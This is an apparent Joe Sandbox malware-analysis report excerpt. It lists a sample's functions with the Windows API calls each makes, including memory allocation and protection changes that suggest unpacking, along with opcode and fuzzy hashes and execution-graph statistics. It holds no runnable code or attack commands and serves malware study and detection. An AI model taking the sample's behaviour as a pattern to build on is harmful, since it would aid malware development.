                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0631FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 9a44ce6ab69b74303afc83854f7a2778a1fac546c700336c5a1f816b8254b147
                                                                                • Instruction ID: 0c52776f994635d5e621f546b8c479a31fba61ea0a7b3d05aa31266d1e577596
                                                                                • Opcode Fuzzy Hash: 9a44ce6ab69b74303afc83854f7a2778a1fac546c700336c5a1f816b8254b147
                                                                                • Instruction Fuzzy Hash: 1D51EFB1C00249AFDF15CF99C884ADEBFB6FF49304F14816AE818AB221D7759955CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0632D668 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250993111.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6320000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 253f914275e5065924cba5fbb2b9245490c77ef5bf3f0ba69ae6aac5bdab19bb
                                                                                • Instruction ID: 09f66df8bdc993e721194bc5f2165f772f457be3ca48ec5ee72a5079fe3a3119
                                                                                • Opcode Fuzzy Hash: 253f914275e5065924cba5fbb2b9245490c77ef5bf3f0ba69ae6aac5bdab19bb
                                                                                • Instruction Fuzzy Hash: 32411671D143968FCB04CFB9D8546EEBFF1AF89310F1985AAD408A7251DB389845CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0631FDA4 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0631FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: e5542588e05c6c270b6412e93316727ad1ff28d37bfccbd48a05b5fcdf9b1737
                                                                                • Instruction ID: aec755ba174fad54030d8db15f5dcb4f4662179eee96443fb458ba2c8d371b6d
                                                                                • Opcode Fuzzy Hash: e5542588e05c6c270b6412e93316727ad1ff28d37bfccbd48a05b5fcdf9b1737
                                                                                • Instruction Fuzzy Hash: 8551B0B1D00349AFDB14CF99C884ADEBBF6FF48314F24812AE419AB251D7759985CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0631FDB0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0631FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 374a5f78e59d3c0ad4971194c96f580db69ce8a49b5807dca29a7f68f73700a3
                                                                                • Instruction ID: 3e3d0fa03f265e47ed45165004b1c7e1f10c6f42dfa8961f22afcad9e4328500
                                                                                • Opcode Fuzzy Hash: 374a5f78e59d3c0ad4971194c96f580db69ce8a49b5807dca29a7f68f73700a3
                                                                                • Instruction Fuzzy Hash: 43419EB1D003499FDB14CF9AC884ADEBBF5FF48310F64852AE819AB250D775A985CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06315780 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0631580F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: f94fa7f7ec9dfbae506116b233b934fea7b532df654a212345b34353cadaa099
                                                                                • Instruction ID: 7079a9c25f6c092b28f86d0dde2f228d943b77933f9616afd175c89c20978334
                                                                                • Opcode Fuzzy Hash: f94fa7f7ec9dfbae506116b233b934fea7b532df654a212345b34353cadaa099
                                                                                • Instruction Fuzzy Hash: 2821E7B5D012089FDB10CF9AD985ADEBFF9FB48320F14841AE919A7310D374A954CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06315788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0631580F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 3d58f9fa32f03a7d2f735f7745c8030962a05d77ad04afbf0e700757c72bdc19
                                                                                • Instruction ID: 30d1c947e4eaadbca57a17cd97a7b2e72d660b37bfe646eec5cf2bd314acd7be
                                                                                • Opcode Fuzzy Hash: 3d58f9fa32f03a7d2f735f7745c8030962a05d77ad04afbf0e700757c72bdc19
                                                                                • Instruction Fuzzy Hash: 3921C4B5D002499FDB10CF9AD984ADEBFF9FB48320F14841AE918A7350D378A954CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02C97260 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02C972D8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3212730777.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c90000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: 0bfb4401bb0a9a67bdd66308e9af744302b4741e884914fbd6da885ef584066d
                                                                                • Instruction ID: e99f69464efc9e79dfc18d0547a480ae5649307fba4c5bee118de3ad31e29db8
                                                                                • Opcode Fuzzy Hash: 0bfb4401bb0a9a67bdd66308e9af744302b4741e884914fbd6da885ef584066d
                                                                                • Instruction Fuzzy Hash: 162144B1C1065A9FCB10CF9AC545BAEFBB4FF48320F14816AE818A7240D738A944CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0631E033 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0631E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 6384bee435582922195e9b9d757a51b24c7f31cca8bae224f6e4086413b8c248
                                                                                • Instruction ID: 45fa0325348a0107016f81d831deacf39db370c15da01a5b9e1393af7404806f
                                                                                • Opcode Fuzzy Hash: 6384bee435582922195e9b9d757a51b24c7f31cca8bae224f6e4086413b8c248
                                                                                • Instruction Fuzzy Hash: F51114B6C002099FDB14CF9AD944ADEFBF8EB89310F10842AE919A7200C779A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02C97268 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02C972D8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3212730777.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c90000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: 2f56ccb38a821489d13d579c6f7266aae1dbd7011875c26f6606823c142f52bc
                                                                                • Instruction ID: 859db565f9db4e9a91ecd5ba1d0294e6f350ca7d6d66aed6b53de4d0f1a3b3ae
                                                                                • Opcode Fuzzy Hash: 2f56ccb38a821489d13d579c6f7266aae1dbd7011875c26f6606823c142f52bc
                                                                                • Instruction Fuzzy Hash: 371136B1C1061A9BCB10CF9AC545B9EFBB4EF48320F10816AE818A7240D738A944CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0632CA54 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0632D6BA), ref: 0632D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250993111.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6320000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: 8151855e363c397a444653716deb76cc3ab7d6792f626fffde07424c7a59e1fd
                                                                                • Instruction ID: 037bb34b0f570fd27f8907b158268273f1d6ee158a540648cc6dfca803c05226
                                                                                • Opcode Fuzzy Hash: 8151855e363c397a444653716deb76cc3ab7d6792f626fffde07424c7a59e1fd
                                                                                • Instruction Fuzzy Hash: C51114B1C0065A9BCB10DF9AC444B9EFBF4EF48310F10816AE818B7240D778A954CFE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0632D738 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0632D6BA), ref: 0632D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250993111.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6320000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: a42df0cbb992d1251bfa38db8ff6754116b80be00e02b69226d2bdb5ab6141a2
                                                                                • Instruction ID: a4e1bf81980e2ceb1a21325c602aed8ea98eff9cf30958bcfd1026489e99e6c4
                                                                                • Opcode Fuzzy Hash: a42df0cbb992d1251bfa38db8ff6754116b80be00e02b69226d2bdb5ab6141a2
                                                                                • Instruction Fuzzy Hash: 981112B1C0066A9FDB10DF9AC444BEEFBF5AF48310F14816AE818A7240D378A954CFE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0631E038 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0631E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: ad71d547b9e9c502f1f6307ea03b6023a5026eed1ba6f0e6e0ccf78ad5bde110
                                                                                • Instruction ID: 1eff710a096faaa66e203259bccdf41e4fadc17b83df6643b8c20fa044561930
                                                                                • Opcode Fuzzy Hash: ad71d547b9e9c502f1f6307ea03b6023a5026eed1ba6f0e6e0ccf78ad5bde110
                                                                                • Instruction Fuzzy Hash: 6411F3B6C002498FDB14DF9AC444ADEFBF4EB88310F10842AD919A7210C779A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0631CF90 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0631DBFC), ref: 0631DE36
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: f7f673489a0ff83618c1ddf83dfdb2c9e70b67a0316213ad9ef769d76776c4e3
                                                                                • Instruction ID: b5a574a7a82efe8745415452809615698c6dae10f93d1de821be80781eedf337
                                                                                • Opcode Fuzzy Hash: f7f673489a0ff83618c1ddf83dfdb2c9e70b67a0316213ad9ef769d76776c4e3
                                                                                • Instruction Fuzzy Hash: 2311F0B6C006498FDB14DF9AC444B9EFBF4EF89210F10846AD419A7600D379A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0141D006 Relevance: .1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3211587661.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_141d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d261f430e72e9584930a718aa966bd7dc68072f80bf3134003abd46f8e87c9bc
                                                                                • Instruction ID: 56ef5cdb124125a86d1c27a9505fd738fbf201058d638a25aad55d7e6620d70e
                                                                                • Opcode Fuzzy Hash: d261f430e72e9584930a718aa966bd7dc68072f80bf3134003abd46f8e87c9bc
                                                                                • Instruction Fuzzy Hash: EA31297150D7C09FDB078B64D994612BF71AB47214F2985DBD8898F2A7C23A980ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0141D044 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3211587661.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_141d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61ded4b95fe75594e1e778f4c7a264d8e674c62b8cbaff675238fa21797d6d7a
                                                                                • Instruction ID: 3bd1a7e16c32a71770b32c4587eb8b5b91545729d13b29ed0a4f5a360ffcd1b1
                                                                                • Opcode Fuzzy Hash: 61ded4b95fe75594e1e778f4c7a264d8e674c62b8cbaff675238fa21797d6d7a
                                                                                • Instruction Fuzzy Hash: 0021F8F19042049FDB15DF68C9C8B16BF65FB84318F20C56ED9494B36AC73AD447CA61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:5.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 6889 a5d030 6890 a5d048 6889->6890 6891 a5d0a3 6890->6891 6893 24ec2e0 6890->6893 6894 24ec308 6893->6894 6897 24ec610 6894->6897 6895 24ec32f 6898 24ec633 6897->6898 6899 24ebad0 VirtualProtect 6898->6899 6901 24ec6df 6898->6901 6900 24ec6d3 6899->6900 6900->6895 6901->6895 6845 24e3ec0 6846 24e3ece 6845->6846 6847 24e3ed4 6846->6847 6853 24e6e0e 6846->6853 6856 24e4557 6846->6856 6860 24e4488 6846->6860 6863 24e686f 6846->6863 6867 24e455e 6846->6867 6870 24ebad0 6853->6870 6857 24e456a 6856->6857 6858 24e459b 6857->6858 6859 24ebad0 VirtualProtect 6857->6859 6859->6858 6878 24ec850 6860->6878 6866 24ebad0 VirtualProtect 6863->6866 6864 24e688c 6865 24e45f1 6865->6863 6865->6864 6866->6865 6869 24ebad0 VirtualProtect 6867->6869 6868 24e459b 6869->6868 6872 24ebae3 6870->6872 6874 24ebe98 6872->6874 6875 24ebee0 VirtualProtect 6874->6875 6877 24e6e29 6875->6877 6881 24ec878 6878->6881 6883 24ec88b 6881->6883 6885 24ec928 6883->6885 6886 24ec968 VirtualAlloc 6885->6886 6888 24e44a8 6886->6888

                                                                                Executed Functions

                                                                                Function 024EBE98 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 427 24ebe98-24ebf19 VirtualProtect 430 24ebf1b-24ebf21 427->430 431 24ebf22-24ebf47 427->431 430->431
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 024EBF0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2408724325.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_24e0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: f0820696f660cecbd9e0815cabfaae67b0d3e68de713fe4d958d4e785827829b
                                                                                • Instruction ID: 7282391817b5be9486e56c021bd3a1b0f176700ea387c23139837b7f9777b181
                                                                                • Opcode Fuzzy Hash: f0820696f660cecbd9e0815cabfaae67b0d3e68de713fe4d958d4e785827829b
                                                                                • Instruction Fuzzy Hash: 9911F4B1D002099FDB10DFAAC884AEEFBF5FF48314F14842AD51AA7250C779A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 024EC928 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 964 24ec928-24ec9a0 VirtualAlloc 967 24ec9a9-24ec9ce 964->967 968 24ec9a2-24ec9a8 964->968 968->967
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 024EC993
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2408724325.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_24e0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 5c1773d67cc7c9463507723a6b05c6d39053d776df202934c8349b81d0daa91a
                                                                                • Instruction ID: 34e4e3babcdde234a8e7cc99540859cda47110e021ed8902140565f4d2f9ab1e
                                                                                • Opcode Fuzzy Hash: 5c1773d67cc7c9463507723a6b05c6d39053d776df202934c8349b81d0daa91a
                                                                                • Instruction Fuzzy Hash: 8D1134759002099FDB10DFAAC844BEFFBF5EF88324F24881AD519A7250CB79A544CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A5D005 Relevance: .1, Instructions: 78COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1151 a5d005-a5d042 1154 a5d0d3-a5d0da 1151->1154 1155 a5d048 1151->1155 1156 a5d04a-a5d056 1154->1156 1155->1156 1158 a5d05c-a5d07e 1156->1158 1159 a5d0df-a5d0e4 1156->1159 1160 a5d080-a5d09f call 24ec2e0 1158->1160 1161 a5d0e9-a5d0fe 1158->1161 1159->1158 1164 a5d0a3-a5d0b3 1160->1164 1165 a5d0b5-a5d0bd 1161->1165 1164->1165 1166 a5d10b 1164->1166 1167 a5d100-a5d109 1165->1167 1168 a5d0bf-a5d0d0 1165->1168 1167->1168
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2407527392.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a5d000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb438ca29849a7b23e19e79fec3d3b06db2ff74339a5c19ab80cd760ce531320
                                                                                • Instruction ID: b929bc2a56f7f0668bd35d663a03189cb65a7a4d4e4c68d21561a77d4048fd8e
                                                                                • Opcode Fuzzy Hash: fb438ca29849a7b23e19e79fec3d3b06db2ff74339a5c19ab80cd760ce531320
                                                                                • Instruction Fuzzy Hash: 94316B7150D3C48FCB13DF24D994715BF71BB86214F2981DAD9858B2A7C33A981ACBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A5D030 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1171 a5d030-a5d042 1172 a5d0d3-a5d0da 1171->1172 1173 a5d048 1171->1173 1174 a5d04a-a5d056 1172->1174 1173->1174 1176 a5d05c-a5d07e 1174->1176 1177 a5d0df-a5d0e4 1174->1177 1178 a5d080-a5d09f call 24ec2e0 1176->1178 1179 a5d0e9-a5d0fe 1176->1179 1177->1176 1182 a5d0a3-a5d0b3 1178->1182 1183 a5d0b5-a5d0bd 1179->1183 1182->1183 1184 a5d10b 1182->1184 1185 a5d100-a5d109 1183->1185 1186 a5d0bf-a5d0d0 1183->1186 1185->1186
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2407527392.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a5d000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ee29c66157fa86c5c5efabb6af3ec0f5d02ba1f2600085881d3abff73920585e
                                                                                • Instruction ID: 517065223a93964d67105db4a235218de19ddd9695b5b586049059649b23769d
                                                                                • Opcode Fuzzy Hash: ee29c66157fa86c5c5efabb6af3ec0f5d02ba1f2600085881d3abff73920585e
                                                                                • Instruction Fuzzy Hash: C5210471504244DFDB25DF14D9C4B2ABF65FB88315F24C669ED0A0B296C33AD80ADBB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06766B6D Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61c47df4d52c693cec88067409d1e1dd67f86c99ba8b6650e27080ccfe1ceb2a
                                                                                • Instruction ID: 4071903856f19a05e19739554f75b733a48d1b457b48fd04c46e6221497f48d9
                                                                                • Opcode Fuzzy Hash: 61c47df4d52c693cec88067409d1e1dd67f86c99ba8b6650e27080ccfe1ceb2a
                                                                                • Instruction Fuzzy Hash: 1D211774A04264CFCB55CF69C984A99BBF5FF49315F0480E9E809AB355CB34AE82CF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 067641AD Relevance: .0, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 17a5d3daddcab9b43d15881fbf8b4c9e24c936b5fc2906c8a98bd1ad694d06e1
                                                                                • Instruction ID: 43bf14c7efab264e345f4e836ccf53c6a8146cd9d8ab5179d34756f0c651c090
                                                                                • Opcode Fuzzy Hash: 17a5d3daddcab9b43d15881fbf8b4c9e24c936b5fc2906c8a98bd1ad694d06e1
                                                                                • Instruction Fuzzy Hash: C6011AB4A111198FDB54DF15C985AAE77B2BB88301F0041E5E80EE3356CB346D81CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06761831 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c2fc44ccd0f6ec72bb6b25c2fc60dfb01525140a82610dbdcc9360d7dac72498
                                                                                • Instruction ID: cab9e94322afa55d429659ec8ac1e0d8ca7637901ab22cea3a3f64a120435775
                                                                                • Opcode Fuzzy Hash: c2fc44ccd0f6ec72bb6b25c2fc60dfb01525140a82610dbdcc9360d7dac72498
                                                                                • Instruction Fuzzy Hash: 89019334E182288FDB64DF29D9556D9BBB2FB88301F0044A5E91DA3345DB386E80CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06762AB6 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02c198c5f69818426a11304bd915563b5bb09b624516cb89afbd260558af3be5
                                                                                • Instruction ID: 09d073facc0e970a98dc474d9d110e3bad92c0a3fe464b82f17b093e2b76b3f1
                                                                                • Opcode Fuzzy Hash: 02c198c5f69818426a11304bd915563b5bb09b624516cb89afbd260558af3be5
                                                                                • Instruction Fuzzy Hash: 6E01A474A002198FDB64EF18D985A99B7B1FB48301F0081E5E949A3385DF346E80CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06764130 Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 56f0782d3ea1126185d1a216924bd5a7a259b6dee3fdb23cec724d72daf9db1a
                                                                                • Instruction ID: 3cfc8eae8fd88beea0e0b924e680d9733659d4fc64656851ea91fa181296edb6
                                                                                • Opcode Fuzzy Hash: 56f0782d3ea1126185d1a216924bd5a7a259b6dee3fdb23cec724d72daf9db1a
                                                                                • Instruction Fuzzy Hash: D1F0F474A111198FDB64EF59C986ADDBBB6FB88301F0040E5E90EA3385CB346E85CF20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

